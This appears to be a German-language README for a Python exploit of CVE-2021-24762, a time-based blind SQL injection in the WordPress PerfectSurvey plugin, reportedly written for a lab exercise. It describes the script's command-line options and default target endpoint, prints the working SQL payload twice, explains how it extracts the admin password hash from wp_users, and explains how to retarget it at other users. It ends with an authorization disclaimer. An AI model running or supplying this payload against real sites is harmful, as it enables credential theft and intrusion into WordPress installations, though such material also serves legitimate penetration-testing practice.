
Dieses Repo zeigt einen Exploit für CVE-2021-24762. Dies ist ein Blind SQLi Exploit, der bei Standardkonfiguration das Admin-Passwort grept.
Dieses Repository zeigt einen Exploit für CVE-2021-24762. Es handelt sich um einen Blind-SQLi-Exploit, der in der Standardkonfiguration das Admin-Passwort ausliest.
Während ich ein Labor auf Basis von WordPress mit dem PerfectSurvey-Plugin durchführte, blieb ich bei einer SQL-Schwachstelle hängen. Die einzigen verfügbaren PoCs, die ich fand, basierten auf sqlmap und funktionierten in dem Labor, an dem ich arbeitete, nicht richtig (es gab viele zusätzliche Probleme, z. B. gab die Anwendung 404 zurück, die Timeouts variierten zu stark und andere Probleme. Also habe ich dies erstellt, um das Labor auszunutzen.
____ _ ___ ____
/ ___| / \ |_ _| / ___|
| | / _ \ | | \___ \
| |___ / ___ \ | | __ ) |
\____|/_/ \_\ |___| |____/
CAIS - Inteligência em Cibersegurança
Exploit for: CVE-2021-24762
usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]
Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it
options:
-h, --help show this help message and exit
-u, --url URL Base URL (default: http://192.168.10.10)
-p, --path PATH path (default: /wp-admin/admin-ajax.php)
-d, --delay DELAY delay in seconds (default: 30)
-t, --timeout TIMEOUT
timeout in seconds (default: delay + 15)
-c, --charset CHARSET
charset to be used (default: alnum + ./$_-@)
-m, --max-len MAX_LEN
maximum length (default: 20)
-v, --verbose activates log debugging
Das Python-Skript empfängt die oben genannten Parameter. Falls sie nicht übergeben werden, wird das Skript mit seinen Standardwerten ausgeführt.
Idealerweise müssen Sie mindestens die URL übergeben. Tun Sie dies mit -u oder --url. Andere Parameter werden wahrscheinlich mit den Standardwerten funktionieren.
In der Standardkonfiguration wird der Passwort-Hash des Benutzers admin abgerufen. Diese Konfiguration wird in der Payload-Variable im Wert von user_login angewendet:
payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"
Falls Sie den Hash für einen anderen Benutzer ermitteln müssen, ändern Sie "0x61646d696e" (admin) entsprechend Ihren Anforderungen.
payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"Eingeschränkte Nutzung — Dieses Repository enthält sensible Inhalte, die ausschließlich für ethische und verantwortungsvolle Nutzung bestimmt sind. Denken Sie daran, dass Sie die schriftliche Erlaubnis des Eigentümers des Systems haben müssen, das Sie testen. Jegliche Nutzung außerhalb dieses Rahmens ist nicht gestattet und wird Ihnen zur Last gelegt (Wollen Sie ins Gefängnis?).
exploit_cve-2021-24762 — Exploit.README.ME — Diese Datei.2025-10-10 — c4cnm — Creation and initial modifications
GNU General Public License v3 (GPL)